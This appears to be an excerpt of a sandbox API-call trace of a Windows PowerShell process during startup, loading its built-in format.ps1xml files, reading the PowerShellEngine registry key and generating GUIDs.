	[0376.853] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d340 | out: lpFileInformation=0x14d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0376.853] SetErrorMode (uMode=0x1) returned 0x1
	[0376.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0376.853] SetErrorMode (uMode=0x1) returned 0x1
	[0376.854] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d340 | out: lpFileInformation=0x14d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0376.854] SetErrorMode (uMode=0x1) returned 0x1
	[0376.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0376.854] SetErrorMode (uMode=0x1) returned 0x1
	[0376.854] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d340 | out: lpFileInformation=0x14d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0376.854] SetErrorMode (uMode=0x1) returned 0x1
	[0376.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0376.854] SetErrorMode (uMode=0x1) returned 0x1
	[0376.854] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d340 | out: lpFileInformation=0x14d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0376.854] SetErrorMode (uMode=0x1) returned 0x1
	[0376.855] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0376.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0376.855] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0376.857] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0376.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0376.857] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0376.857] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0376.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0376.857] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0376.858] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0376.858] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0376.858] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0376.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0376.858] SetErrorMode (uMode=0x1) returned 0x1
	[0376.859] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0376.859] GetFileType (hFile=0x300) returned 0x1
	[0376.859] SetErrorMode (uMode=0x1) returned 0x1
	[0376.859] GetFileType (hFile=0x300) returned 0x1
	[0376.859] ReadFile (in: hFile=0x300, lpBuffer=0x31f92f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x31f92f0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0376.860] ReadFile (in: hFile=0x300, lpBuffer=0x31f92f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x31f92f0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0376.861] ReadFile (in: hFile=0x300, lpBuffer=0x31f92f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x31f92f0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0376.861] ReadFile (in: hFile=0x300, lpBuffer=0x31f92f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x31f92f0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0376.861] ReadFile (in: hFile=0x300, lpBuffer=0x31f92f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x31f92f0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0376.861] ReadFile (in: hFile=0x300, lpBuffer=0x31f92f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x31f92f0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0376.862] ReadFile (in: hFile=0x300, lpBuffer=0x31f92f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x31f92f0*, lpNumberOfBytesRead=0x14cfd8*=0x9e2, lpOverlapped=0x0) returned 1
	[0376.862] ReadFile (in: hFile=0x300, lpBuffer=0x31f883a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x31f883a*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0376.862] ReadFile (in: hFile=0x300, lpBuffer=0x31f92f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x31f92f0*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0376.862] CloseHandle (hObject=0x300) returned 1
	[0376.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0376.862] SetErrorMode (uMode=0x1) returned 0x1
	[0376.862] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cf80 | out: lpFileInformation=0x14cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0376.862] SetErrorMode (uMode=0x1) returned 0x1
	[0376.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0376.863] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d068 | out: phkResult=0x14d068*=0x300) returned 0x0
	[0376.863] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfec, lpData=0x0, lpcbData=0x14cfe8*=0x0 | out: lpType=0x14cfec*=0x1, lpData=0x0, lpcbData=0x14cfe8*=0x56) returned 0x0
	[0376.863] CoTaskMemAlloc (cb=0x5a) returned 0x1b702b60
	[0376.863] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfbc, lpData=0x1b702b60, lpcbData=0x14cfb8*=0x56 | out: lpType=0x14cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cfb8*=0x56) returned 0x0
	[0376.863] CoTaskMemFree (pv=0x1b702b60) 
	[0376.863] RegCloseKey (hKey=0x300) returned 0x0
	[0376.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0376.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0376.900] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x29e01bde, Data2=0xf97b, Data3=0x402d, Data4=([0]=0xac, [1]=0xff, [2]=0x1, [3]=0x40, [4]=0xdd, [5]=0x54, [6]=0xe8, [7]=0x92))) returned 0x0
	[0377.259] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x81d3f093, Data2=0xf38a, Data3=0x4bd6, Data4=([0]=0x8e, [1]=0xb3, [2]=0x61, [3]=0x28, [4]=0x38, [5]=0x8b, [6]=0x5f, [7]=0x92))) returned 0x0
	[0377.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0377.262] SetErrorMode (uMode=0x1) returned 0x1
	[0377.262] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0377.262] GetFileType (hFile=0x300) returned 0x1
	[0377.262] SetErrorMode (uMode=0x1) returned 0x1
	[0377.262] GetFileType (hFile=0x300) returned 0x1
	[0377.262] ReadFile (in: hFile=0x300, lpBuffer=0x3223e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3223e58*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.263] ReadFile (in: hFile=0x300, lpBuffer=0x3223e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3223e58*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.264] ReadFile (in: hFile=0x300, lpBuffer=0x3223e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3223e58*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.264] ReadFile (in: hFile=0x300, lpBuffer=0x3223e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3223e58*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.264] ReadFile (in: hFile=0x300, lpBuffer=0x3223e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3223e58*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.265] ReadFile (in: hFile=0x300, lpBuffer=0x3223e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3223e58*, lpNumberOfBytesRead=0x14cfd8*=0xfb2, lpOverlapped=0x0) returned 1
	[0377.265] ReadFile (in: hFile=0x300, lpBuffer=0x3223572, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3223572*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0377.265] ReadFile (in: hFile=0x300, lpBuffer=0x3223e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3223e58*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0377.265] CloseHandle (hObject=0x300) returned 1
	[0377.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0377.266] SetErrorMode (uMode=0x1) returned 0x1
	[0377.266] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cf80 | out: lpFileInformation=0x14cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0377.266] SetErrorMode (uMode=0x1) returned 0x1
	[0377.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0377.266] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d068 | out: phkResult=0x14d068*=0x300) returned 0x0
	[0377.266] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfec, lpData=0x0, lpcbData=0x14cfe8*=0x0 | out: lpType=0x14cfec*=0x1, lpData=0x0, lpcbData=0x14cfe8*=0x56) returned 0x0
	[0377.266] CoTaskMemAlloc (cb=0x5a) returned 0x1b702b60
	[0377.266] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfbc, lpData=0x1b702b60, lpcbData=0x14cfb8*=0x56 | out: lpType=0x14cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cfb8*=0x56) returned 0x0
	[0377.266] CoTaskMemFree (pv=0x1b702b60) 
	[0377.267] RegCloseKey (hKey=0x300) returned 0x0
	[0377.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0377.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0377.268] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x957d7afa, Data2=0xeeb7, Data3=0x444d, Data4=([0]=0x83, [1]=0x31, [2]=0x60, [3]=0x2d, [4]=0x40, [5]=0xe1, [6]=0x24, [7]=0x3e))) returned 0x0
	[0377.270] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x2ccb0fb2, Data2=0x8062, Data3=0x466c, Data4=([0]=0x8c, [1]=0x9, [2]=0x89, [3]=0x7d, [4]=0x3c, [5]=0xd7, [6]=0x6, [7]=0x24))) returned 0x0
	[0377.271] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x123984f1, Data2=0x160f, Data3=0x4c69, Data4=([0]=0x9f, [1]=0x84, [2]=0x7f, [3]=0x39, [4]=0x8a, [5]=0x7d, [6]=0x26, [7]=0x34))) returned 0x0
	[0377.271] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x7b7ab39d, Data2=0x5ccb, Data3=0x4e70, Data4=([0]=0xb3, [1]=0x67, [2]=0x56, [3]=0x43, [4]=0xec, [5]=0x2b, [6]=0x8a, [7]=0xbb))) returned 0x0
	[0377.271] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xa61ba453, Data2=0xab86, Data3=0x4c00, Data4=([0]=0x86, [1]=0x76, [2]=0x20, [3]=0x2, [4]=0xad, [5]=0x1c, [6]=0x9c, [7]=0x3b))) returned 0x0
	[0377.271] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x4ddbd03d, Data2=0x5d9c, Data3=0x4fd5, Data4=([0]=0x8d, [1]=0xeb, [2]=0xc3, [3]=0x8, [4]=0xff, [5]=0xff, [6]=0xa2, [7]=0x65))) returned 0x0
	[0377.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0377.271] SetErrorMode (uMode=0x1) returned 0x1
	[0377.271] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0377.272] GetFileType (hFile=0x300) returned 0x1
	[0377.272] SetErrorMode (uMode=0x1) returned 0x1
	[0377.272] GetFileType (hFile=0x300) returned 0x1
	[0377.272] ReadFile (in: hFile=0x300, lpBuffer=0x326fbb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x326fbb8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.273] ReadFile (in: hFile=0x300, lpBuffer=0x326fbb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x326fbb8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.273] ReadFile (in: hFile=0x300, lpBuffer=0x326fbb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x326fbb8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.274] ReadFile (in: hFile=0x300, lpBuffer=0x326fbb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x326fbb8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.274] ReadFile (in: hFile=0x300, lpBuffer=0x326fbb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x326fbb8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.274] ReadFile (in: hFile=0x300, lpBuffer=0x326fbb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x326fbb8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0377.275] ReadFile (in: hFile=0x300, lpBuffer=0x326fbb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x326fbb8*, lpNumberOfBytesRead=0x14cfd8*=0xaca, lpOverlapped=0x0) returned 1
	[0377.275] ReadFile (in: hFile=0x300, lpBuffer=0x326f1ea, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x326f1ea*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0377.275] ReadFile (in: hFile=0x300, lpBuffer=0x326fbb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x326fbb8*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0377.275] CloseHandle (hObject=0x300) returned 1
	[0377.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0377.275] SetErrorMode (uMode=0x1) returned 0x1
	[0377.275] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cf80 | out: lpFileInformation=0x14cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0377.275] SetErrorMode (uMode=0x1) returned 0x1
	[0377.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0377.276] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d068 | out: phkResult=0x14d068*=0x300) returned 0x0
	[0377.276] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfec, lpData=0x0, lpcbData=0x14cfe8*=0x0 | out: lpType=0x14cfec*=0x1, lpData=0x0, lpcbData=0x14cfe8*=0x56) returned 0x0
	[0377.276] CoTaskMemAlloc (cb=0x5a) returned 0x1b702b60
	[0377.276] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfbc, lpData=0x1b702b60, lpcbData=0x14cfb8*=0x56 | out: lpType=0x14cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cfb8*=0x56) returned 0x0
	[0377.276] CoTaskMemFree (pv=0x1b702b60) 
	[0377.276] RegCloseKey (hKey=0x300) returned 0x0
	[0377.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0377.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0377.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
